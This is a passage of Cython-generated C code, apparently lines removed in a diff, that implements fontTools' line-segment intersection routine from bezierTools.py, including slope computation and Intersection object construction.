"fontTools/misc/bezierTools.py":1186 - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] - * if math.isclose(e1x, s1x): # <<<<<<<<<<<<<< - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) - */ - } - - /* "fontTools/misc/bezierTools.py":1196 - * ) - * ] - * if math.isclose(s2x, e2x): # <<<<<<<<<<<<<< - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_math); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = 
__Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_s2x, __pyx_v_e2x}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1197 - * ] - * if math.isclose(s2x, e2x): - * x = s2x # <<<<<<<<<<<<<< - * slope12 = (e1y - s1y) / (e1x - s1x) - * y = slope12 * (x - s1x) + s1y - */ - __Pyx_INCREF(__pyx_v_s2x); - __pyx_v_x = __pyx_v_s2x; - - /* "fontTools/misc/bezierTools.py":1198 - * if math.isclose(s2x, e2x): - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) # <<<<<<<<<<<<<< - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - */ - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e1y, __pyx_v_s1y); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1198, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Subtract(__pyx_v_e1x, __pyx_v_s1x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1198, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1198, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; 
- __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_slope12 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1199 - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) - * y = slope12 * (x - s1x) + s1y # <<<<<<<<<<<<<< - * pt = (x, y) - * return [ - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x, __pyx_v_s1x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1199, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_v_slope12, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1199, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_s1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1199, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1200 - * slope12 = (e1y - s1y) / (e1x - s1x) - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) # <<<<<<<<<<<<<< - * return [ - * Intersection( - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1200, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x)) __PYX_ERR(0, 1200, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y)) __PYX_ERR(0, 1200, __pyx_L1_error); - __pyx_v_pt = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1201 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":1202 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_Intersection); if 
(unlikely(!__pyx_t_1)) __PYX_ERR(0, 1202, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":1203 - * return [ - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) # <<<<<<<<<<<<<< - * ) - * ] - */ - __pyx_t_2 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s1, __pyx_v_e1, __pyx_v_pt}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_t1, __pyx_t_3) < 0) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); 
- __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s2, __pyx_v_e2, __pyx_v_pt}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_t2, __pyx_t_3) < 0) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1202 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_empty_tuple, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1202, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1201 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1201, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_3)) __PYX_ERR(0, 1201, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1196 - * ) - * ] - * if math.isclose(s2x, e2x): # <<<<<<<<<<<<<< - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) - */ - } - - /* "fontTools/misc/bezierTools.py":1207 - * ] - * - * slope12 = (e1y - s1y) / (e1x - s1x) # <<<<<<<<<<<<<< - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_e1y, __pyx_v_s1y); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1207, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e1x, __pyx_v_s1x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1207, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1207, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_slope12 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1208 - * - * slope12 = (e1y - s1y) / (e1x - s1x) - * slope34 = (e2y - s2y) / (e2x - s2x) # <<<<<<<<<<<<<< - * if math.isclose(slope12, slope34): - * return [] - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_e2y, __pyx_v_s2y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1208, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e2x, __pyx_v_s2x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1208, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1208, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_slope34 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1209 - * slope12 = (e1y - s1y) / (e1x - s1x) - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): # <<<<<<<<<<<<<< - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); 
- if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_slope12, __pyx_v_slope34}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1210 - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): - * return [] # <<<<<<<<<<<<<< - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - * y = slope12 * (x - s1x) + s1y - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1210, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1209 - * slope12 = (e1y - s1y) / (e1x - s1x) - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): # <<<<<<<<<<<<<< - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - */ - } - - /* "fontTools/misc/bezierTools.py":1211 - * if math.isclose(slope12, slope34): - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) # <<<<<<<<<<<<<< - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_slope12, __pyx_v_s1x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_s1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1211, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_v_slope34, __pyx_v_s2x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Subtract(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_v_s2y); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_v_slope12, __pyx_v_slope34); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_x = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1212 - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - * y = slope12 * (x - s1x) + s1y # <<<<<<<<<<<<<< - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x, __pyx_v_s1x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1212, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Multiply(__pyx_v_slope12, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1212, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_v_s1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1212, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1213 - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - * y = 
slope12 * (x - s1x) + s1y - * pt = (x, y) # <<<<<<<<<<<<<< - * if _both_points_are_on_same_side_of_origin( - * pt, e1, s1 - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1213, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x)) __PYX_ERR(0, 1213, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y)) __PYX_ERR(0, 1213, __pyx_L1_error); - __pyx_v_pt = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_both_points_are_on_same_side_of); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1214, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - - /* "fontTools/misc/bezierTools.py":1215 - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( - * pt, e1, s1 # <<<<<<<<<<<<<< - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ - */ - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_2, __pyx_v_pt, __pyx_v_e1, __pyx_v_s1}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1214, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - - /* "fontTools/misc/bezierTools.py":1214 - * y = 
slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1214, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L29_bool_binop_done; - } - - /* "fontTools/misc/bezierTools.py":1216 - * if _both_points_are_on_same_side_of_origin( - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): # <<<<<<<<<<<<<< - * return [ - * Intersection( - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_both_points_are_on_same_side_of); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1216, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_2, __pyx_v_pt, __pyx_v_s2, __pyx_v_e2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1216, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1216, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_7; - __pyx_L29_bool_binop_done:; - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, 
e2): - */ - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1217 - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":1218 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1218, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":1219 - * return [ - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) # <<<<<<<<<<<<<< - * ) - * ] - */ - __pyx_t_3 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s1, __pyx_v_e1, __pyx_v_pt}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if 
(PyDict_SetItem(__pyx_t_3, __pyx_n_s_t1, __pyx_t_2) < 0) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s2, __pyx_v_e2, __pyx_v_pt}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t2, __pyx_t_2) < 0) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1218 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ - * Intersection( # <<<<<<<<<<<<<< - * 